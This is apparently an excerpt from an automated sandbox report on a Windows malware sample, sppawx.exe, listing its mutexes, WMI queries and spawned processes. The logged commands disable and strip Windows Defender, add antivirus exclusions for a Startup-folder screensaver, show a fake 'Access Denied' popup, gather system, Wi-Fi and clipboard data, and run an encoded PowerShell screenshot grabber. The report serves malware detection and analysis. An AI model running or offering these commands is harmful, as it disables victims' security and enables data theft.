              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2376:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5648:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2880:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3144:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2184:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4356:120:WilError_03
              Source: C:\Users\user\Desktop\sppawx.exeMutant created: \Sessions\1\BaseNamedObjects\f
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6708:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3764:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1300:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7248:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2028:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6172:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3268:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2856:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3884:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78082Jump to behavior
              Source: sppawx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\sppawx.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: sppawx.exe, 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: sppawx.exe, sppawx.exe, 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: sppawx.exe, sppawx.exe, 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: sppawx.exe, sppawx.exe, 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: sppawx.exe, sppawx.exe, 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: sppawx.exe, sppawx.exe, 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: sppawx.exe, sppawx.exe, 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: sppawx.exeReversingLabs: Detection: 36%
              Source: sppawx.exeString found in binary or memory: id-cmc-addExtensions
              Source: sppawx.exeString found in binary or memory: set-addPolicy
              Source: C:\Users\user\Desktop\sppawx.exeFile read: C:\Users\user\Desktop\sppawx.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\sppawx.exe "C:\Users\user\Desktop\sppawx.exe"
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Users\user\Desktop\sppawx.exe "C:\Users\user\Desktop\sppawx.exe"
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'"
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlA